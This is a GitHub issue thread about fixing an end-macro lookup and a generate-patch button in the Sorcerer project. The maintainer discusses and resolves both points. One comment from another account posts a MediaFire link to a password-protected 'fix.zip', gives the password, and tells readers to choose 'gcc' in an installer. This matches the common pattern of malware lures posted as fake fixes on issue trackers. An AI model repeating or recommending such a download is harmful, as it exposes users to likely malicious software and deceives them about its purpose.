### ISSUE TITLE
Fix Orb End Macro for Scene and Put Generate Patch Button in orb_operators.py

### ISSUE THREAD

**Issue by jordanhenshaw** [Alva-Theaters/Sorcerer#51]
Needs to be fixed. User should be able to escape out of the generate patch thingy.

Also, per title, the end macro for Scene was deleted from the UI in TIME, but haven't updated orb.py to reflect that, which needs to be done I think? Or maybe it will automatically find it anyway since it defaults to zero? But definitely need to check it out since I'm not sure. Probably need to add a line that uses the find function for end macro and then for start macro too if it's currently zero.

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jordanhenshaw** [comment]
Generate Patch button was put in the orb.py with 152d1f1734b635df108053540a93b63bc784e863

**Comment by jordanhenshaw** [comment]
This was tested a while ago. The scene level Orb make qmeo function works just fine, it already uses the find function and doesn't give the error for it being automatically set to 0.
